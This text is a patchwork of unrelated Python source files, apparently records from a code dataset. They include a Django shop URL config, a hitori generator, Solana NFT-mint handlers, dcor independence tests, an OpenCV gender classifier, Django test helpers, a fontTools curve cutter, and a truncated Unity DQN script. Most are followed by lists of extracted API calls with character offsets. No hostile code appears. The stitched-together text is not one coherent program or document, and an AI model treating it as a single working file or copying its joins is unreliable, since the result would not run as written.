trim_end])\n', (20215, 20242), True, 'import numpy as np\n'), ((10779, 10798), 'numpy.array', 'np.array', (['([1.0] * 4)'], {}), '([1.0] * 4)\n', (10787, 10798), True, 'import numpy as np\n'), ((10954, 10974), 'numpy.array', 'np.array', (['([0.25] * 4)'], {}), '([0.25] * 4)\n', (10962, 10974), True, 'import numpy as np\n')] |
from django.urls import path
from . import views
app_name = "shop"
urlpatterns = [
path('', views.HomePage.as_view(), name="home-page"),
path('shop/', views.ProductListView.as_view(), name="product-list"),
path('shop/<int:category_pk>/', views.ProductListView.as_view(), name="product-list"),
path('shop/products/<int:pk>/', views.ProductDetailView.as_view(), name="product-detail"),
path('cart/', views.cart_view, name="cart"),
path('cart/add/<int:product_pk>/', views.add_product_to_order, name="add-product-to-cart"),
path('cart/add/<int:product_pk>/json/', views.add_product_to_cart_json, name="add-product-to-cart-json"),
path('checkout/', views.CheckOut.as_view(), name="checkout"),
path('checkout/<int:address_pk>/', views.CheckOut.as_view(), name="checkout"),
path('payment/', views.PaymentChoice.as_view(), name="payment-choice"),
path('payment/order/<int:pk>/', views.MomoPayment.as_view(), name="momo-payment"),
path('payment/momo/<int:pk>/confirm/', views.ConfirmMomoPayment.as_view(), name="confirm-momo-payment"),
path('orders/', views.OrderList.as_view(), name="order-list"),
path('orders/<int:pk>/', views.OrderDetail.as_view(), name="order-detail"),
path('orders/<int:order_id>/items/<int:pk>/', views.OrderItemDetail.as_view(), name="order-item-detail"),
]
| [
"django.urls.path"
] | [((406, 449), 'django.urls.path', 'path', (['"""cart/"""', 'views.cart_view'], {'name': '"""cart"""'}), "('cart/', views.cart_view, name='cart')\n", (410, 449), False, 'from django.urls import path\n'), ((455, 550), 'django.urls.path', 'path', (['"""cart/add/<int:product_pk>/"""', 'views.add_product_to_order'], {'name': '"""add-product-to-cart"""'}), "('cart/add/<int:product_pk>/', views.add_product_to_order, name=\n 'add-product-to-cart')\n", (459, 550), False, 'from django.urls import path\n'), ((551, 659), 'django.urls.path', 'path', (['"""cart/add/<int:product_pk>/json/"""', 'views.add_product_to_cart_json'], {'name': '"""add-product-to-cart-json"""'}), "('cart/add/<int:product_pk>/json/', views.add_product_to_cart_json,\n name='add-product-to-cart-json')\n", (555, 659), False, 'from django.urls import path\n')] |
from hitori_generator import Generator
from argparse import ArgumentParser
def generate(n: int, output_file: str) -> None:
if n < 3 or n > 8:
print("It isn't valid size")
exit(4)
generator = Generator(n)
data = generator.generate()
lines = map(lambda x: ' '.join(map(str, x)), data)
with open(output_file, 'w', encoding='utf-8') as f:
f.write('\n'.join(lines))
def main():
p = ArgumentParser()
p.add_argument('filename', type=str, help='Path to output file')
p.add_argument('-s', "--size", type=int, default=3, help='Generate SxS field. size must be in [3, 8]. Default is 3')
args = p.parse_args()
generate(args.size, args.filename)
if __name__ == '__main__':
main()
| [
"hitori_generator.Generator",
"argparse.ArgumentParser"
] | [((217, 229), 'hitori_generator.Generator', 'Generator', (['n'], {}), '(n)\n', (226, 229), False, 'from hitori_generator import Generator\n'), ((429, 445), 'argparse.ArgumentParser', 'ArgumentParser', ([], {}), '()\n', (443, 445), False, 'from argparse import ArgumentParser\n')] |
from common.make_tx import make_swap_tx
from sol.handle_simple import handle_unknown_detect_transfers
def handle_metaplex(exporter, txinfo):
transfers_in, transfers_out, _ = txinfo.transfers_net
if len(transfers_in) == 1 and len(transfers_out) == 1:
sent_amount, sent_currency, _, _ = transfers_out[0]
received_amount, received_currency, _, _ = transfers_in[0]
row = make_swap_tx(txinfo, sent_amount, sent_currency, received_amount, received_currency)
exporter.ingest_row(row)
else:
handle_unknown_detect_transfers(exporter, txinfo)
def is_nft_mint(txinfo):
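    # Heuristic: treat the transaction as an NFT mint when a MintTo instruction
    # appears alongside a single outgoing payment and at most one incoming
    # transfer of amount 1 (the freshly minted token).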
log_instructions = txinfo.log_instructions
transfers_in, transfers_out, _ = txinfo.transfers_net
if "MintTo" in log_instructions and len(transfers_out) == 1 and len(transfers_in) == 0:
return True
elif ("MintTo" in log_instructions
and len(transfers_out) == 1
and len(transfers_in) == 1
and transfers_in[0][0] == 1):
return True
else:
return False
def handle_nft_mint(exporter, txinfo):
transfers_in, transfers_out, transfers_unknown = txinfo.transfers_net
if len(transfers_in) == 1 and len(transfers_out) == 1:
sent_amount, sent_currency, _, _ = transfers_out[0]
received_amount, received_currency, _, _ = transfers_in[0]
row = make_swap_tx(txinfo, sent_amount, sent_currency, received_amount, received_currency)
exporter.ingest_row(row)
return
handle_unknown_detect_transfers(exporter, txinfo)
| [
"common.make_tx.make_swap_tx",
"sol.handle_simple.handle_unknown_detect_transfers"
] | [((1494, 1543), 'sol.handle_simple.handle_unknown_detect_transfers', 'handle_unknown_detect_transfers', (['exporter', 'txinfo'], {}), '(exporter, txinfo)\n', (1525, 1543), False, 'from sol.handle_simple import handle_unknown_detect_transfers\n'), ((403, 491), 'common.make_tx.make_swap_tx', 'make_swap_tx', (['txinfo', 'sent_amount', 'sent_currency', 'received_amount', 'received_currency'], {}), '(txinfo, sent_amount, sent_currency, received_amount,\n received_currency)\n', (415, 491), False, 'from common.make_tx import make_swap_tx\n'), ((539, 588), 'sol.handle_simple.handle_unknown_detect_transfers', 'handle_unknown_detect_transfers', (['exporter', 'txinfo'], {}), '(exporter, txinfo)\n', (570, 588), False, 'from sol.handle_simple import handle_unknown_detect_transfers\n'), ((1356, 1444), 'common.make_tx.make_swap_tx', 'make_swap_tx', (['txinfo', 'sent_amount', 'sent_currency', 'received_amount', 'received_currency'], {}), '(txinfo, sent_amount, sent_currency, received_amount,\n received_currency)\n', (1368, 1444), False, 'from common.make_tx import make_swap_tx\n')] |
"""
Functions for testing independence of several distributions.
The functions in this module provide methods for testing if
the samples generated from two random vectors are independent.
"""
import numpy as np
import scipy.stats
from . import _dcor_internals, _hypothesis
from ._dcor import u_distance_correlation_sqr
from ._utils import _random_state_init, _transform_to_2d
def distance_covariance_test(
x,
y,
*,
num_resamples=0,
exponent=1,
random_state=None,
n_jobs=1,
):
"""
Test of distance covariance independence.
Compute the test of independence based on the distance
covariance, for two random vectors.
The test is a permutation test where the null hypothesis is that the two
random vectors are independent.
Parameters
----------
x: array_like
First random vector. The columns correspond with the individual random
variables while the rows are individual instances of the random vector.
y: array_like
Second random vector. The columns correspond with the individual random
variables while the rows are individual instances of the random vector.
exponent: float
Exponent of the Euclidean distance, in the range :math:`(0, 2)`.
Equivalently, it is twice the Hurst parameter of fractional Brownian
motion.
num_resamples: int
        Number of permutation resamples to take in the permutation test.
random_state: {None, int, array_like, numpy.random.RandomState}
Random state to generate the permutations.
Returns
-------
HypothesisTest
Results of the hypothesis test.
See Also
--------
distance_covariance
Examples
--------
>>> import numpy as np
>>> import dcor
>>> a = np.array([[1, 2, 3, 4],
... [5, 6, 7, 8],
... [9, 10, 11, 12],
... [13, 14, 15, 16]])
>>> b = np.array([[1, 0, 0, 1],
... [0, 1, 1, 1],
... [1, 1, 1, 1],
... [1, 1, 0, 1]])
>>> dcor.independence.distance_covariance_test(a, a)
HypothesisTest(p_value=1.0, statistic=208.0)
>>> dcor.independence.distance_covariance_test(a, b)
... # doctest: +ELLIPSIS
HypothesisTest(p_value=1.0, statistic=11.75323056...)
>>> dcor.independence.distance_covariance_test(b, b)
HypothesisTest(p_value=1.0, statistic=1.3604610...)
>>> dcor.independence.distance_covariance_test(a, b,
... num_resamples=5, random_state=0)
HypothesisTest(p_value=0.5, statistic=11.7532305...)
>>> dcor.independence.distance_covariance_test(a, b,
... num_resamples=5, random_state=13)
HypothesisTest(p_value=0.3333333..., statistic=11.7532305...)
>>> dcor.independence.distance_covariance_test(a, a,
... num_resamples=7, random_state=0)
HypothesisTest(p_value=0.125, statistic=208.0)
"""
x = _transform_to_2d(x)
y = _transform_to_2d(y)
_dcor_internals._check_same_n_elements(x, y)
random_state = _random_state_init(random_state)
# Compute U-centered matrices
u_x = _dcor_internals._distance_matrix_generic(
x,
centering=_dcor_internals.double_centered,
exponent=exponent)
u_y = _dcor_internals._distance_matrix_generic(
y,
centering=_dcor_internals.double_centered,
exponent=exponent)
# Use the dcov statistic
def statistic_function(distance_matrix):
return u_x.shape[0] * _dcor_internals.mean_product(
distance_matrix, u_y)
return _hypothesis._permutation_test_with_sym_matrix(
u_x,
statistic_function=statistic_function,
num_resamples=num_resamples,
random_state=random_state,
n_jobs=n_jobs)
def partial_distance_covariance_test(
x,
y,
z,
*,
num_resamples=0,
exponent=1,
random_state=None,
n_jobs=1,
):
"""
Test of partial distance covariance independence.
Compute the test of independence based on the partial distance
covariance, for two random vectors conditioned on a third.
The test is a permutation test where the null hypothesis is that the first
two random vectors are independent given the third one.
Parameters
----------
x: array_like
First random vector. The columns correspond with the individual random
variables while the rows are individual instances of the random vector.
y: array_like
Second random vector. The columns correspond with the individual random
variables while the rows are individual instances of the random vector.
z: array_like
Observed random vector. The columns correspond with the individual
random variables while the rows are individual instances of the random
vector.
num_resamples: int
        Number of permutation resamples to take in the permutation test.
random_state: {None, int, array_like, numpy.random.RandomState}
Random state to generate the permutations.
Returns
-------
HypothesisTest
Results of the hypothesis test.
See Also
--------
partial_distance_covariance
Examples
--------
>>> import numpy as np
>>> import dcor
>>> a = np.array([[1, 2, 3, 4],
... [5, 6, 7, 8],
... [9, 10, 11, 12],
... [13, 14, 15, 16]])
>>> b = np.array([[1, 0, 0, 1],
... [0, 1, 1, 1],
... [1, 1, 1, 1],
... [1, 1, 0, 1]])
>>> c = np.array([[1000, 0, 0, 1000],
... [0, 1000, 1000, 1000],
... [1000, 1000, 1000, 1000],
... [1000, 1000, 0, 1000]])
>>> dcor.independence.partial_distance_covariance_test(a, a, b)
... # doctest: +ELLIPSIS
HypothesisTest(p_value=1.0, statistic=142.6664416...)
>>> dcor.independence.partial_distance_covariance_test(a, b, c)
... # doctest: +ELLIPSIS
HypothesisTest(p_value=1.0, statistic=7.2690070...e-15)
>>> dcor.independence.partial_distance_covariance_test(b, b, c)
... # doctest: +ELLIPSIS
HypothesisTest(p_value=1.0, statistic=2.2533380...e-30)
>>> dcor.independence.partial_distance_covariance_test(a, b, c,
... num_resamples=5, random_state=0)
HypothesisTest(p_value=0.1666666..., statistic=7.2690070...e-15)
>>> dcor.independence.partial_distance_covariance_test(a, b, c,
... num_resamples=5, random_state=13)
HypothesisTest(p_value=0.1666666..., statistic=7.2690070...e-15)
>>> dcor.independence.partial_distance_covariance_test(a, c, b,
... num_resamples=7, random_state=0)
HypothesisTest(p_value=1.0, statistic=-7.5701764...e-12)
"""
random_state = _random_state_init(random_state)
# Compute U-centered matrices
u_x = _dcor_internals._u_distance_matrix(x, exponent=exponent)
u_y = _dcor_internals._u_distance_matrix(y, exponent=exponent)
u_z = _dcor_internals._u_distance_matrix(z, exponent=exponent)
# Compute projections
proj = _dcor_internals.u_complementary_projection(u_z)
p_xz = proj(u_x)
p_yz = proj(u_y)
# Use the pdcor statistic
def statistic_function(distance_matrix):
return u_x.shape[0] * _dcor_internals.u_product(
distance_matrix, p_yz)
return _hypothesis._permutation_test_with_sym_matrix(
p_xz,
statistic_function=statistic_function,
num_resamples=num_resamples,
random_state=random_state,
n_jobs=n_jobs)
def distance_correlation_t_statistic(x, y):
"""
Transformation of the bias corrected version of distance correlation used
in :func:`distance_correlation_t_test`.
Parameters
----------
x: array_like
First random vector. The columns correspond with the individual random
variables while the rows are individual instances of the random vector.
y: array_like
Second random vector. The columns correspond with the individual random
variables while the rows are individual instances of the random vector.
Returns
-------
numpy scalar
T statistic.
See Also
--------
distance_correlation_t_test
Examples
--------
>>> import numpy as np
>>> import dcor
>>> a = np.array([[1, 2, 3, 4],
... [5, 6, 7, 8],
... [9, 10, 11, 12],
... [13, 14, 15, 16]])
>>> b = np.array([[1, 0, 0, 1],
... [0, 1, 1, 1],
... [1, 1, 1, 1],
... [1, 1, 0, 1]])
>>> with np.errstate(divide='ignore'):
... dcor.independence.distance_correlation_t_statistic(a, a)
inf
>>> dcor.independence.distance_correlation_t_statistic(a, b)
... # doctest: +ELLIPSIS
-0.4430164...
>>> with np.errstate(divide='ignore'):
... dcor.independence.distance_correlation_t_statistic(b, b)
inf
"""
bcdcor = u_distance_correlation_sqr(x, y)
n = x.shape[0]
v = n * (n - 3) / 2
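    # Under independence, sqrt(v - 1) * bcdcor / sqrt(1 - bcdcor**2) is
    # approximately Student t distributed with v - 1 degrees of freedom; this
    # is the distribution used by distance_correlation_t_test below.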
return np.sqrt(v - 1) * bcdcor / np.sqrt(1 - bcdcor**2)
def distance_correlation_t_test(x, y):
"""
Test of independence for high dimension based on convergence to a Student t
distribution. The null hypothesis is that the two random vectors are
independent.
Parameters
----------
x: array_like
First random vector. The columns correspond with the individual random
variables while the rows are individual instances of the random vector.
y: array_like
Second random vector. The columns correspond with the individual random
variables while the rows are individual instances of the random vector.
Returns
-------
HypothesisTest
Results of the hypothesis test.
See Also
--------
distance_correlation_t_statistic
Examples
--------
>>> import numpy as np
>>> import dcor
>>> a = np.array([[1, 2, 3, 4],
... [5, 6, 7, 8],
... [9, 10, 11, 12],
... [13, 14, 15, 16]])
>>> b = np.array([[1, 0, 0, 1],
... [0, 1, 1, 1],
... [1, 1, 1, 1],
... [1, 1, 0, 1]])
>>> with np.errstate(divide='ignore'):
... dcor.independence.distance_correlation_t_test(a, a)
... # doctest: +ELLIPSIS
HypothesisTest(p_value=0.0, statistic=inf)
>>> dcor.independence.distance_correlation_t_test(a, b)
... # doctest: +ELLIPSIS
HypothesisTest(p_value=0.6327451..., statistic=-0.4430164...)
>>> with np.errstate(divide='ignore'):
... dcor.independence.distance_correlation_t_test(b, b)
... # doctest: +ELLIPSIS
HypothesisTest(p_value=0.0, statistic=inf)
"""
t_test = distance_correlation_t_statistic(x, y)
n = x.shape[0]
v = n * (n - 3) / 2
df = v - 1
p_value = 1 - scipy.stats.t.cdf(t_test, df=df)
return _hypothesis.HypothesisTest(p_value=p_value, statistic=t_test)
| [
"numpy.sqrt"
] | [((9268, 9292), 'numpy.sqrt', 'np.sqrt', (['(1 - bcdcor ** 2)'], {}), '(1 - bcdcor ** 2)\n', (9275, 9292), True, 'import numpy as np\n'), ((9242, 9256), 'numpy.sqrt', 'np.sqrt', (['(v - 1)'], {}), '(v - 1)\n', (9249, 9256), True, 'import numpy as np\n')] |
#coding=utf-8
# Gender recognition
import cv2
from keras.models import load_model
import numpy as np
import chineseText
img = cv2.imread("img/gather.png")
face_classifier = cv2.CascadeClassifier(
"d:\Python36\Lib\site-packages\opencv-master\data\haarcascades\haarcascade_frontalface_default.xml"
)
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
faces = face_classifier.detectMultiScale(
gray, scaleFactor=1.2, minNeighbors=3, minSize=(140, 140))
gender_classifier = load_model(
"classifier/gender_models/simple_CNN.81-0.96.hdf5")
gender_labels = {0: '女', 1: '男'}
color = (255, 255, 255)
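# For each detected face: crop with a margin around the detection box, resize
# to the 48x48 input the gender CNN expects, scale pixel values to [0, 1],
# then draw the predicted label next to the face.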
for (x, y, w, h) in faces:
face = img[(y - 60):(y + h + 60), (x - 30):(x + w + 30)]
face = cv2.resize(face, (48, 48))
face = np.expand_dims(face, 0)
face = face / 255.0
gender_label_arg = np.argmax(gender_classifier.predict(face))
gender = gender_labels[gender_label_arg]
cv2.rectangle(img, (x, y), (x + h, y + w), color, 2)
img = chineseText.cv2ImgAddText(img, gender, x + h, y, color, 30)
cv2.imshow("Image", img)
cv2.waitKey(0)
cv2.destroyAllWindows()
| [
"cv2.rectangle",
"keras.models.load_model",
"cv2.imshow",
"cv2.waitKey",
"cv2.destroyAllWindows",
"cv2.cvtColor",
"numpy.expand_dims",
"cv2.CascadeClassifier",
"cv2.resize",
"cv2.imread",
"chineseText.cv2ImgAddText"
] | [((113, 141), 'cv2.imread', 'cv2.imread', (['"""img/gather.png"""'], {}), "('img/gather.png')\n", (123, 141), False, 'import cv2\n'), ((160, 299), 'cv2.CascadeClassifier', 'cv2.CascadeClassifier', (['"""d:\\\\Python36\\\\Lib\\\\site-packages\\\\opencv-master\\\\data\\\\haarcascades\\\\haarcascade_frontalface_default.xml"""'], {}), "(\n 'd:\\\\Python36\\\\Lib\\\\site-packages\\\\opencv-master\\\\data\\\\haarcascades\\\\haarcascade_frontalface_default.xml'\n )\n", (181, 299), False, 'import cv2\n'), ((296, 333), 'cv2.cvtColor', 'cv2.cvtColor', (['img', 'cv2.COLOR_BGR2GRAY'], {}), '(img, cv2.COLOR_BGR2GRAY)\n', (308, 333), False, 'import cv2\n'), ((460, 522), 'keras.models.load_model', 'load_model', (['"""classifier/gender_models/simple_CNN.81-0.96.hdf5"""'], {}), "('classifier/gender_models/simple_CNN.81-0.96.hdf5')\n", (470, 522), False, 'from keras.models import load_model\n'), ((1010, 1034), 'cv2.imshow', 'cv2.imshow', (['"""Image"""', 'img'], {}), "('Image', img)\n", (1020, 1034), False, 'import cv2\n'), ((1035, 1049), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (1046, 1049), False, 'import cv2\n'), ((1050, 1073), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (1071, 1073), False, 'import cv2\n'), ((685, 711), 'cv2.resize', 'cv2.resize', (['face', '(48, 48)'], {}), '(face, (48, 48))\n', (695, 711), False, 'import cv2\n'), ((723, 746), 'numpy.expand_dims', 'np.expand_dims', (['face', '(0)'], {}), '(face, 0)\n', (737, 746), True, 'import numpy as np\n'), ((886, 938), 'cv2.rectangle', 'cv2.rectangle', (['img', '(x, y)', '(x + h, y + w)', 'color', '(2)'], {}), '(img, (x, y), (x + h, y + w), color, 2)\n', (899, 938), False, 'import cv2\n'), ((949, 1008), 'chineseText.cv2ImgAddText', 'chineseText.cv2ImgAddText', (['img', 'gender', '(x + h)', 'y', 'color', '(30)'], {}), '(img, gender, x + h, y, color, 30)\n', (974, 1008), False, 'import chineseText\n')] |
from django.test import TestCase
from os import path
from rest_framework import status
from rest_framework.test import APIClient
import random
from scheduler.models import Profile
from scheduler.factories import (
CourseFactory,
SpacetimeFactory,
UserFactory,
ProfileFactory,
SectionFactory,
AttendanceFactory,
OverrideFactory,
create_attendances_for,
)
random.seed(0)
COURSE_NAMES = ("CS88", "CS61A", "CS61B", "CS70", "CS61C", "EE16A")
ROLE_MAP = Profile.ROLE_MAP
BASE_PATH = "/scheduler"
# ----- REQUEST UTILITIES -----
def fail_msg(ep, resp):
return "Endpoint: {}\nResponse Content: {}".format(ep, resp.content)
class APITestCase(TestCase):
def get_client_for(self, user):
"""Returns an APIClient object that is logged in as the provided user."""
client = APIClient()
client.force_authenticate(user)
return client
def request(self, method, endpoint, exp_code=None, data=None):
"""
Performs a request to the specified endpoint and returns the response object.
Also checks if the status code of the response is exp_code, if provided.
The method parameter should be a get/post/etc from an APIClient object.
"""
resp = method(path.join(BASE_PATH, endpoint.strip("/")), follow=True, data=data)
if exp_code is not None:
self.assertEqual(resp.status_code, exp_code, msg=fail_msg(endpoint, resp))
return resp
def req_fails_perms(self, method, endpoint, data=None):
"""
Performs a request to the specified endpoint, and checks that it fails
due to the user lacking proper permissions.
The method parameter should be a get/post/etc from an APIClient object.
Returns the response object afterwards.
"""
return self.request(
method, endpoint, exp_code=status.HTTP_403_FORBIDDEN, data=data
)
def req_fails_method(self, method, endpoint, data=None):
"""
Performs a request to the specified endpoint, and checks that it fails
due to the endpoint not supporting the provided method.
Returns the response object.
"""
return self.request(
method, endpoint, exp_code=status.HTTP_405_METHOD_NOT_ALLOWED, data=data
)
def req_succeeds(self, method, endpoint, data=None):
"""
Performs a request to the specified endpoint, and checks that it succeeds.
The method parameter should be a get/post/etc from an APIClient object.
Returns the response object.
"""
return self.request(method, endpoint, exp_code=status.HTTP_200_OK, data=data)
# ----- MODEL GENERATION -----
def random_objs(clazz, n=1):
"""
Generates N instances of the provided class, retrieved from the database.
"""
src = clazz.objects.all()
for _ in range(n):
yield random.choice(src)
def make_test_courses():
"""Creates course objects and persists them to database."""
return [CourseFactory.create(name=name) for name in COURSE_NAMES]
def make_test_users(n):
"""Creates N test users and persists them to database."""
return UserFactory.create_batch(n)
def give_role(user, role, course):
"""
Creates a profile for USER in a given ROLE for the provided COURSE, and
saves the profile to database.
"""
return ProfileFactory.create(
user=user, course=course, leader=None, section=None, role=role
)
def create_empty_section_for(mentor):
"""
Creates a section for MENTOR without populated students.
"""
return SectionFactory.create(course=mentor.course, mentor=mentor)
def enroll_user_as_student(user, section):
"""
Creates a student profile for USER, and assigns them to the given SECTION.
Also creates blank attendances as necessary.
Returns the created profile.
"""
student = give_role(user, Profile.STUDENT, section.course)
student.section = section
student.leader = section.leader
create_attendances_for(student)
return student
def gen_test_data(cls, NUM_USERS=300):
"""
Adds NUM_USERS users to the database and initializes profiles for them as follows:
- 2 coords per course
- 4 SMs per coord, each with a section of 3-6 students
- 3 JMs per SM, each with a section of 3-6 students
"""
users = iter(make_test_users(NUM_USERS))
courses = make_test_courses()
# for sanity tests, everyone only has one role for now
num_courses = len(courses)
coords, seniors, juniors, students = [], [], [], []
COORD_COUNT = 2
SM_COUNT = 4
JM_COUNT = 3
def assign(role, leader, c, lst):
# returns the profile created
profile = give_role(next(users), role, c)
profile.leader = leader
lst.append(profile)
return profile
try:
for c in courses:
# coords
for i in range(COORD_COUNT):
coord = assign(Profile.COORDINATOR, None, c, coords)
# SMs
for j in range(SM_COUNT):
sm = assign(Profile.SENIOR_MENTOR, coord, c, seniors)
section = create_empty_section_for(sm)
for k in range(random.randint(3, 6)):
students.append(enroll_user_as_student(next(users), section))
# JMs
for k in range(JM_COUNT):
jm = assign(Profile.JUNIOR_MENTOR, sm, c, juniors)
for _ in range(random.randint(3, 6)):
students.append(
enroll_user_as_student(next(users), section)
)
except StopIteration:
pass
cls.users = users
cls.courses = courses
cls.coords = coords
cls.seniors = seniors
cls.juniors = juniors
cls.students = students
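# Sketch of how a test case might consume gen_test_data (illustrative only;
# the project's concrete test classes are defined elsewhere):
#   class ExampleAPITest(APITestCase):
#       @classmethod
#       def setUpTestData(cls):
#           gen_test_data(cls, NUM_USERS=100)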
| [
"random.choice",
"scheduler.factories.create_attendances_for",
"scheduler.factories.UserFactory.create_batch",
"random.seed",
"rest_framework.test.APIClient",
"scheduler.factories.SectionFactory.create",
"scheduler.factories.ProfileFactory.create",
"scheduler.factories.CourseFactory.create",
"random.randint"
] | [((388, 402), 'random.seed', 'random.seed', (['(0)'], {}), '(0)\n', (399, 402), False, 'import random\n'), ((3184, 3211), 'scheduler.factories.UserFactory.create_batch', 'UserFactory.create_batch', (['n'], {}), '(n)\n', (3208, 3211), False, 'from scheduler.factories import CourseFactory, SpacetimeFactory, UserFactory, ProfileFactory, SectionFactory, AttendanceFactory, OverrideFactory, create_attendances_for\n'), ((3378, 3467), 'scheduler.factories.ProfileFactory.create', 'ProfileFactory.create', ([], {'user': 'user', 'course': 'course', 'leader': 'None', 'section': 'None', 'role': 'role'}), '(user=user, course=course, leader=None, section=None,\n role=role)\n', (3399, 3467), False, 'from scheduler.factories import CourseFactory, SpacetimeFactory, UserFactory, ProfileFactory, SectionFactory, AttendanceFactory, OverrideFactory, create_attendances_for\n'), ((3600, 3658), 'scheduler.factories.SectionFactory.create', 'SectionFactory.create', ([], {'course': 'mentor.course', 'mentor': 'mentor'}), '(course=mentor.course, mentor=mentor)\n', (3621, 3658), False, 'from scheduler.factories import CourseFactory, SpacetimeFactory, UserFactory, ProfileFactory, SectionFactory, AttendanceFactory, OverrideFactory, create_attendances_for\n'), ((4002, 4033), 'scheduler.factories.create_attendances_for', 'create_attendances_for', (['student'], {}), '(student)\n', (4024, 4033), False, 'from scheduler.factories import CourseFactory, SpacetimeFactory, UserFactory, ProfileFactory, SectionFactory, AttendanceFactory, OverrideFactory, create_attendances_for\n'), ((821, 832), 'rest_framework.test.APIClient', 'APIClient', ([], {}), '()\n', (830, 832), False, 'from rest_framework.test import APIClient\n'), ((3027, 3058), 'scheduler.factories.CourseFactory.create', 'CourseFactory.create', ([], {'name': 'name'}), '(name=name)\n', (3047, 3058), False, 'from scheduler.factories import CourseFactory, SpacetimeFactory, UserFactory, ProfileFactory, SectionFactory, AttendanceFactory, OverrideFactory, create_attendances_for\n'), ((2905, 2923), 'random.choice', 'random.choice', (['src'], {}), '(src)\n', (2918, 2923), False, 'import random\n'), ((5211, 5231), 'random.randint', 'random.randint', (['(3)', '(6)'], {}), '(3, 6)\n', (5225, 5231), False, 'import random\n'), ((5506, 5526), 'random.randint', 'random.randint', (['(3)', '(6)'], {}), '(3, 6)\n', (5520, 5526), False, 'import random\n')] |
import math
from fontTools.pens.recordingPen import RecordingPen, replayRecording
from fontTools.misc.bezierTools import calcCubicArcLength, splitCubicAtT
from coldtype.geometry import Rect, Point
def raise_quadratic(start, a, b):
c0 = start
c1 = (c0[0] + (2/3)*(a[0] - c0[0]), c0[1] + (2/3)*(a[1] - c0[1]))
c2 = (b[0] + (2/3)*(a[0] - b[0]), b[1] + (2/3)*(a[1] - b[1]))
c3 = (b[0], b[1])
return [c1, c2, c3]
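# (Standard degree elevation: the quadratic segment with on-curve points
# `start` and `b` and off-curve point `a` is reproduced exactly by the cubic
# whose control points sit two-thirds of the way from each end point toward
# `a`, which is what raise_quadratic computes above.)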
__length_cache = {}
__split_cache = {}
def splitCubicAtT_cached(a, b, c, d, t):
global __split_cache
abcdt = (a, b, c, d, t)
sc = __split_cache.get(abcdt)
if sc:
return sc
else:
s = splitCubicAtT(a, b, c, d, t)
__split_cache[abcdt] = s
return s
def calcCubicArcLength_cached(a, b, c, d):
#return calcCubicArcLength(a, b, c, d)
global __length_cache
abcd = (a, b, c, d)
lc = __length_cache.get(abcd)
if lc:
return lc
else:
l = calcCubicArcLength(a, b, c, d)
__length_cache[abcd] = l
return l
class CurveCutter():
def __init__(self, g, inc=0.0015):
if isinstance(g, RecordingPen):
self.pen = g
else:
self.pen = RecordingPen()
g.draw(self.pen)
self.inc = inc
self.length = self.calcCurveLength()
def calcCurveLength(self):
length = 0
for i, (t, pts) in enumerate(self.pen.value):
if t == "curveTo":
p1, p2, p3 = pts
p0 = self.pen.value[i-1][-1][-1]
length += calcCubicArcLength_cached(p0, p1, p2, p3)
elif t == "lineTo":
pass # todo
return length
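    # subsegment walks the recorded contour, accumulating arc length per curveTo;
    # once the requested end length falls inside a curve, it grows the split
    # parameter in steps of self.inc until the left half of the split reaches
    # that length, emits the truncated curve, and drops everything after it.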
def subsegment(self, start=None, end=None):
global __cut_cache
inc = self.inc
length = self.length
ended = False
_length = 0
out = []
for i, (t, pts) in enumerate(self.pen.value):
if t == "curveTo":
p1, p2, p3 = pts
p0 = self.pen.value[i-1][-1][-1]
length_arc = calcCubicArcLength_cached(p0, p1, p2, p3)
if _length + length_arc < end:
_length += length_arc
else:
t = inc
tries = 0
while not ended:
a, b = splitCubicAtT_cached(p0, p1, p2, p3, t)
length_a = calcCubicArcLength_cached(*a)
if _length + length_a > end:
ended = True
out.append(("curveTo", a[1:]))
else:
t += inc
tries += 1
if t == "lineTo":
pass # TODO
if not ended:
out.append((t, pts))
if out[-1][0] != "endPath":
out.append(("endPath",[]))
return out
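    # subsegmentPoint returns the on-curve point at arc length `end` along the
    # contour, together with the tangent angle there (in degrees, rotated 90).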
def subsegmentPoint(self, start=0, end=1):
inc = self.inc
subsegment = self.subsegment(start=start, end=end)
try:
t, (a, b, c) = subsegment[-2]
tangent = math.degrees(math.atan2(c[1] - b[1], c[0] - b[0]) + math.pi*.5)
return c, tangent
except ValueError:
return None, None | [
"fontTools.misc.bezierTools.splitCubicAtT",
"fontTools.pens.recordingPen.RecordingPen",
"math.atan2",
"fontTools.misc.bezierTools.calcCubicArcLength"
] | [((650, 678), 'fontTools.misc.bezierTools.splitCubicAtT', 'splitCubicAtT', (['a', 'b', 'c', 'd', 't'], {}), '(a, b, c, d, t)\n', (663, 678), False, 'from fontTools.misc.bezierTools import calcCubicArcLength, splitCubicAtT\n'), ((951, 981), 'fontTools.misc.bezierTools.calcCubicArcLength', 'calcCubicArcLength', (['a', 'b', 'c', 'd'], {}), '(a, b, c, d)\n', (969, 981), False, 'from fontTools.misc.bezierTools import calcCubicArcLength, splitCubicAtT\n'), ((1195, 1209), 'fontTools.pens.recordingPen.RecordingPen', 'RecordingPen', ([], {}), '()\n', (1207, 1209), False, 'from fontTools.pens.recordingPen import RecordingPen, replayRecording\n'), ((3145, 3181), 'math.atan2', 'math.atan2', (['(c[1] - b[1])', '(c[0] - b[0])'], {}), '(c[1] - b[1], c[0] - b[0])\n', (3155, 3181), False, 'import math\n')] |
"""
Project for Udacity Nanodegree in Deep Reinforcement Learning
This script trains an agent to navigate (and collect bananas!) in a large, square world.
A reward of +1 is provided for collecting a yellow banana, and a reward of -1 is provided for collecting a blue banana. Thus, the goal of your agent is to collect as many yellow bananas as possible while avoiding blue bananas.
The state space has 37 dimensions and contains the agent's velocity, along with ray-based perception of objects around the agent's forward direction. Given this information, the agent has to learn how to best select actions. Four discrete actions are available, corresponding to:
0 - move forward.
1 - move backward.
2 - turn left.
3 - turn right.
The task is episodic, and in order to solve the environment, your agent must get an average score of +13 over 100 consecutive episodes.
"""
from unityagents import UnityEnvironment
import numpy as np
from collections import deque
from dqn_agent import Agent
import torch
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
"""
Unity environment configuration
Mac: "path/to/Banana.app"
Windows (x86): "path/to/Banana_Windows_x86/Banana.exe"
Windows (x86_64): "path/to/Banana_Windows_x86_64/Banana.exe"
Linux (x86): "path/to/Banana_Linux/Banana.x86"
Linux (x86_64): "path/to/Banana_Linux/Banana.x86_64"
Linux (x86, headless): "path/to/Banana_Linux_NoVis/Banana.x86"
